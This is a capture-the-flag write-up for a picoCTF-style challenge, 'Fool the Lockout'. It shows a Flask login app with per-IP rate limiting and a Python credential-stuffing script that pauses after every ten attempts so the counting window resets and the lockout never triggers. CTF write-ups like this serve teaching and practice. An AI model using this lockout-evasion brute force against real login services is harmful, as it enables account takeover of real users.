Fool the Lockout¶
Files Provided¶
creds-dump.txt and app.py:
from flask import Flask, render_template, request, redirect, url_for, session, make_response
import time
import secrets
import json
app = Flask(__name__)
app.secret_key = secrets.token_hex(16)
user_db = {}
""" format ->
username: "password"
}
"""
request_rates = {}
""" format ->
"ip_addr":{
"num_requests": int
"epoch_start": timestamp
"lockout_until" : int # -1 if not locked out, timestamp of lockout end
}
"""
MAX_REQUESTS = 10 # max failed attempts before a user is locked out
EPOCH_DURATION = 30 # timeframe for failed attempts (in seconds)
LOCKOUT_DURATION = 120 # duration a user will be locked out for (in seconds)
RATE_LIMITED_HTML = "<h1>Rate Limited Exceeded</h1><p>You have sent too many requests, requests from your IP will be temporarily blocked.</p>"
## ------------------------ HELPER FUNCTIONS ------------------------ ##
"""Quick function to no-cache web page responses"""
def no_cache(response):
response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "-1"
return response
"""Returns true if a user is logged in, false otherwise"""
def logged_in():
if "user" in session:
return True
return False
"""Returns the current user (or None if there is none)"""
def current_user():
if "user" in session:
return session["user"]
return None
"""Add a new user to db"""
def add_new_user(username, password):
user_db[username] = password
print("Added (username=%s, password=%s) to user_db" % (username, password))
""" Updates the request rates db for a given client ip, since information will likely be stale."""
def refresh_request_rates_db(client_ip):
curr_time = time.time()
if client_ip not in request_rates:
return
# check if attempt interval has elapsed, if so sets it to 0
epoch_start_time = request_rates[client_ip]["epoch_start"]
if curr_time - epoch_start_time > EPOCH_DURATION:
request_rates[client_ip]["num_requests"] = 0
request_rates[client_ip]["epoch_start"] = -1
# if was locked out but period ended update store
lockout_end = request_rates[client_ip]["lockout_until"]
if (lockout_end != -1) and time.time() >= lockout_end:
request_rates[client_ip]["lockout_until"] = -1
"""For a given user IP, checks how many requests the user has made (by updating the storage) and if
the user it has exceeded the assigned rate limit. Returns true if the user has exceeded rate limit,
false otherwise. """
def exceeded_rate_limit() -> bool: # Could do a daemon, but since checks of status are always done before updating its not really necessary
curr_time = time.time()
# Grab the IP of the client
client_ip = request.remote_addr
print(f"Request ip address: {client_ip}", flush=True)
# refresh & add new entry to db if it doesnt exist
refresh_request_rates_db(client_ip)
if client_ip not in request_rates:
request_rates[client_ip] = {
"num_requests": 0,
"epoch_start": -1,
"lockout_until": -1
}
print(f"New entry added to db", flush=True)
# log request if it was a POST
if request.method == "POST":
request_rates[client_ip]['num_requests'] += 1
# if epoch hasnt started, set epoch
if request_rates[client_ip]['epoch_start'] == -1:
request_rates[client_ip]['epoch_start'] = curr_time
print(f"DB updated - {client_ip}:{request_rates[client_ip]}", flush=True)
# check if we exceeded rate threshold, return True if so
if request_rates[client_ip]['num_requests'] > MAX_REQUESTS:
if request_rates[client_ip]["lockout_until"] == -1:
request_rates[client_ip]['lockout_until'] = curr_time + LOCKOUT_DURATION
print("Account locked out")
print(f"DB - {client_ip}:{request_rates[client_ip]}", flush=True)
return True
return False
## ------------------------ APP ROUTES ------------------------ ##
""" Login portal """
@app.route("/login", methods=['GET', 'POST'])
def login():
## TODO - check rate limit
if exceeded_rate_limit():
return RATE_LIMITED_HTML
# if POST, accept form data and try to add user
if request.method == "POST":
user_input = request.form['username']
pswd_input = request.form['password']
print("User input: %s, password input: %s" % (user_input, pswd_input))
# non-existent user or bad password
if (user_input not in user_db) or (user_db[user_input] != pswd_input):
msg = f"Invalid username or password."
return render_template("login.html", error=msg)
# authenticate user
session["user"] = user_input
print("Successfully logged in, session=%s" % (session))
return redirect(url_for("index")) # note 'index' refers to the FUNCTION NAME
# return normal page if 'GET'
return no_cache(make_response(render_template('login.html')))
""" Homepage """
@app.route("/", methods=['GET'])
def index():
if exceeded_rate_limit():
return RATE_LIMITED_HTML
# authenticate
if not logged_in():
return redirect(url_for("login"))
# display homepage according to login
user = current_user()
flag = open("/challenge/flag.txt").read().strip()
return no_cache(make_response(render_template("index.html", user=user, flag=flag)))
""" Logout """
@app.route("/logout", methods=['GET'])
def logout():
if exceeded_rate_limit():
return RATE_LIMITED_HTML
if "user" in session:
session.pop('user', None)
print("Logged out, popped session")
return redirect(url_for("login"))
if __name__ == '__main__':
username, password = None, None
# get profile data
try:
with open("/challenge/profile.json", "r") as file:
profile = json.load(file)
username = profile["username"]
password = profile["password"]
except Exception as e:
print(f"Error setting up profile in app:\n{e}")
exit(1)
# add new user
add_new_user(username, password)
# start app
app.run(host='0.0.0.0', port=8000, debug=True)
Approach¶
EPOCH_DURATION = 30 seconds only, so we can stop brute forcing for 30 seconds after every 10 attempts. Since the creds-dump.txt has only 100 credentials, this approach won't result in timeout of instance.
Script:
import requests
import time
url = "http://candy-mountain.picoctf.net:59159/login"
with open("creds-dump.txt") as f:
creds = f.readlines()
for i, cred in enumerate(creds):
user, pwd = cred.strip().split(";")
r = requests.post(url, data={
"username": user,
"password": pwd
}, allow_redirects=False)
print(user, pwd, r.status_code)
if r.status_code == 302:
print("FOUND:", user, pwd)
break
if (i+1) % 10 == 0: # sleep every 10 attempts
print("Sleeping 30s to reset epoch...")
time.sleep(31)